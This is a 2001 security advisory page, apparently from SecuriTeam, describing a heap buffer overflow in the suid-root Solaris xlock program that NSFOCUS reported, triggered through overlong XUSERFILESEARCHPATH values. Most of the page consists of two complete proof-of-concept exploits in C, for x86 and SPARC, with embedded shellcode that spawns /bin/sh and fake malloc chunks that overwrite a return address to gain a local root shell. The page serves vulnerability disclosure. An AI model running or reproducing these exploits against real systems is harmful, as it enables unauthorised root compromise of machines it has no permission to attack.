Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Solaris Xlock Heap Overflow Vulnerability (Exploit, XUSERFILESEARCHPATH) 14 Aug. 2001    Summary The NSFOCUS Security Team has found a heap buffer overflow vulnerability in the xlock shipped in Solaris system. This problem arises when handling some environment variables. Exploitation gives a local attacker root privileges.   Credit: The information has been provided by Nsfocus Security Team. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable systems: Sun Solaris 2.6 (SPARC/x86) Sun Solaris 7 (SPARC/x86) Sun Solaris 8 (SPARC/x86) Xlock is a screen-locking tool of Solaris OpenView. It locks the X server until a password is entered. It is installed suid root by default. Due to a lack of boundary checking in some environment variable handling, an attacker could overwrite dynamic memory boundary of heap area, run arbitrary code as root with carefully constructed overflow data. The problem is within these two environment variables: "XFILESEARCHPATH" and "XUSERFILESEARCHPATH". Xlock calls malloc() to allocate 1024 bytes memory and save the environment variable value in this dynamic memory. But xlock does not provide length check of environment variable when copying. In case that these two environment variables are set to be a string longer than 1024 bytes, a heap overflow might occur. Adjacent dynamic memory boundary tags could be overwritten, and segment fault would occur when malloc() is called next time. Some special "feature" of libc malloc()/free() implementation could be used to rewrite arbitrary memory like saved returned address and function pointer or other important data with carefully formed overflow data. Exploiting this vulnerability successfully would give an attacker root privilege. Exploit: /*  * sol_x86_xlockex.c - Proof of Concept Code for xlock heap overflow bug.  * Copyright (c) 2001 - Nsfocus.com  *  * Tested in Solaris 8 x86.  *  * DISCLAIMS:  * This is a proof of concept code. This code is for test purpose  * only and should not be run against any host without permission from  * the system administrator.  *  * NSFOCUS Security Team <security@nsfocus.com>  * http://www.nsfocus.com  */   #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <strings.h> #include <sys/types.h> #define RETLOC 0x080463c8 /* default retrun address location (Solaris 8 x86) */ #define SP 0x08047ffc /* default "bottom" stack address (Solaris 8 x86) */ #define VULPROG "/usr/openwin/bin/xlock" char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xeb\x28\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x8b\xec\x83\xec\x64\x33\xd2\xc6\x45\xce\x9a\x89" "\x55\xcf\x89\x55\xd3\xc6\x45\xd3\x07\xc6\x45\xd5" "\xc3\x89\x55\xfc\x83\xed\x32\x33\xc0\x50\x50\xb0" "\xca\xff\xd5\x83\xc4\x08\x31\xc0\x50\x68\x2f\x2f" "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89" "\xe2\x50\x52\x53\xb0\x3b\xff\xd5"; int main(int argc, char **argv) {         char buf[2048], fake_chunk[48];         long retaddr, sp_addr = SP;         char *arg[24], *env[24];         long retloc = RETLOC;         unsigned int *ptr;         char ev1[]="XUSERFILESEARCHPATH=";         long ev1_len;         long overbuflen = 1024;         if (argc > 1) /* adjust retloc */                 retloc += atoi(argv[1]);         bzero(buf, sizeof(buf));         ev1_len = strlen(ev1);         memcpy(buf, ev1, ev1_len);         memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));         arg[0] = VULPROG;         arg[1] = NULL;         env[0] = shellcode; /* put shellcode in env */         env[1] = buf; /* put overflow environ */         env[2] = NULL; /* end of env */                  /* get the not exact shellcode address :) */         retaddr = sp_addr - strlen(VULPROG) - 1                           - strlen("i86pc") - 1                           - strlen(buf) - 1                           - strlen(shellcode) - 1;         printf("Using RET address = 0x%lx\n", retaddr);         printf("Using retloc = 0x%lx \n", retloc);         ptr = (unsigned int *) fake_chunk;         memset(fake_chunk, '\xff', sizeof(fake_chunk));         *(ptr + 0) = 0xfffffff9;         *(ptr + 2) = retaddr;         *(ptr + 8) = retloc - 8;         memcpy(buf + ev1_len + overbuflen, fake_chunk, sizeof(fake_chunk));         execve(VULPROG, arg, env);         perror("execle");         return(1); } /* End of main */ /*  * sol_sparc_xlockex.c - Proof of Concept Code for xlock heap overflow bug.  * Copyright (c) 2001 - Nsfocus.com  *  * Tested in Solaris 2.6/7/8 SPARC  *  * DISCLAIMS:  * This is a proof of concept code. This code is for test purpose  * only and should not be run against any host without permission from  * the system administrator.  *  * NSFOCUS Security Team <security@nsfocus.com>  * http://www.nsfocus.com  */   #include <stdio.h> #include <stdlib.h> #include <sys/systeminfo.h> #define RETLOC 0xffbee8c4 /* default "return address" location (Solaris 7) */ #define SP 0xffbefffc /* default "bottom" stack address (Solaris 7/8) */ #define VULPROG "/usr/openwin/bin/xlock" #define NOP 0xaa1d4015 /* "xor %l5, %l5, %l5" */ char shellcode[] = /* from scz's shellcode for SPARC */ "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\xaa\x1d\x40\x15" "\x81\xc3\xe0\x14\xaa\x1d\x40\x15\xaa\x1d\x40\x15\x90\x08\x3f\xff" "\x82\x10\x20\x8d\x91\xd0\x20\x08\x90\x08\x3f\xff\x82\x10\x20\x17" "\x91\xd0\x20\x08\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65" "\x20\x80\x3a\x29\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34" "\x92\x0b\x80\x0e\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc" "\xc0\x2a\x20\x07\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f" "\x82\x10\x20\x01\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff"; /* get current stack point address */ long get_sp(void) {         __asm__("mov %sp,%i0"); } long get_shelladdr(long sp_addr, char **arg, char **env) {         long retaddr;         int i;         char plat[256];         char pad = 0, pad1;         int env_len, arg_len, len;         /* calculate the length of "VULPROG" + argv[] */         for (i = 0, arg_len = 0; arg[i]!=NULL ; i++) {                 arg_len += strlen(arg[i]) + 1;         }                  /* calculate the pad nummber . */         pad = 3 - arg_len % 4;         printf("shellcode address padding = %d\n", pad);         memset(env[0], 'A', pad);         env[0][pad] = '\0';                 /* get environ length */         for (i = 0, env_len = 0; env[i]!=NULL; i++) {                 env_len += strlen(env[i]) + 1;         }         /* get platform info */         sysinfo(SI_PLATFORM, plat, 256);         len = arg_len + env_len + strlen(plat) + 1 + strlen(VULPROG) + 1;         printf("stack arguments len = %#x(%d)\n", len, len);         pad1 = len % 4;         if(pad1 == 3 ) pad1 = 5;         else pad1 = 4 - pad1;         printf("the padding zeros number = %d\n\n", pad1);         /* get the exact shellcode address */         retaddr = sp_addr - pad1 /* the trailing zero number */                           - strlen(VULPROG) - 1                           - strlen(plat) - 1 ;         for(i--;i>0;i--) retaddr -= strlen(env[i]) + 1;         printf("Using RET address = 0x%x\n", retaddr);         return retaddr; } /* End of get_shelladdr */ int main(int argc, char **argv) {         char buf[2048], fake_chunk[48];         long retaddr, sp_addr = SP;         char *arg[24], *env[24];         char padding[64];         long retloc = RETLOC;         unsigned int *ptr;         char ev1[]="XUSERFILESEARCHPATH=";         long ev1_len;         long overbuflen = 1024;         if (argc > 1) /* you need adjust retloc offset in your system */                 retloc += atoi(argv[1]);         arg[0] = VULPROG;         arg[1] = NULL;         bzero(buf, sizeof(buf));         ev1_len = strlen(ev1);         memcpy(buf, ev1, ev1_len);         memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));                  env[0] = padding; /* put padding buffer in env */         env[1] = shellcode; /* put shellcode in env */         env[2] = buf; /* put overflow environ */         env[3] = NULL; /* end of env */         /* get stack "bottom" address */         if(((unsigned char) (get_sp() >> 24)) == 0xef) { /* Solaris 2.6 */           sp_addr = SP - 0x0fbf0000;           retloc -= 0x0fbf0000;         }         retaddr = get_shelladdr(sp_addr, arg, env);         printf("Using retloc = 0x%x \n", retloc);                  memset(fake_chunk, '\xff', sizeof(fake_chunk));         ptr = (unsigned int *) fake_chunk;         *(ptr + 0) = 0xfffffff9;         *(ptr + 2) = retaddr - 8;         *(ptr + 8) = retloc - 8;         memcpy(buf + ev1_len + overbuflen, fake_chunk, sizeof(fake_chunk));         execve(VULPROG, arg, env);         perror("execle"); } /* End of main */  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®